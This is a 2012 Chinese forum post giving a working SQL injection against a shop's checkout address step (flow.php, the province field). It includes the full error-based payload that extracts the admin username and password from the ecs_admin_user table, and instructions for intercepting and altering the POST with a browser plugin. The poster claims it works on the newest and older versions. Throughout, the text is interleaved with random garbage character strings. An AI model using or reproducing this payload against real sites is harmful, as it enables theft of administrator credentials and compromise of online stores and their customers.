感谢欠杀的黑盒
8 [- g; Q6 ~9 R8 B, x$ @7 l( ~8 u- p B
* x7 Q1 E! S$ v* Y7 o把任意商品加入购物车在填写配送地址那一页,有地区选择
/ x& t. c R4 B/ E( h
4 ^! _' @0 k; X4 Nflow.php?step=consignee&direct_shopping=1& h6 r% b- J9 L
比如省选择安徽3 l/ r! u! j+ t3 ^+ g5 b/ {% {
1 r, s4 X2 R: z
其中POST数据如下. ^$ v# m8 x P7 K2 q, \( g# j
2 m. X1 T" O" a/ Wcountry=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3( K/ X$ K. T9 s' f) l- W/ c9 B1 N; Y' |
改成
+ j9 O- F: l, R. Z& ^1 W8 ?
8 l, Q, G$ D, [( w, w/ Gprovince=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #: |, Y4 A3 K% j$ r0 Z/ z' m
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..
4 V, o- s) q5 x4 t / J8 j4 N/ z$ O$ D' n, h
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
& F4 R e" {% {6 a
+ {4 Q7 e) @# N% r b就会回显错误页面了。。。。
7 Z* N, V' S" u! f3 m) p5 s 7 X& t3 |4 j H- v+ K
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的/ H' T1 ^- ?/ k9 W8 d5 H% ?, s
|
发表于 2012-12-31 09:19:27
收藏
支持
反对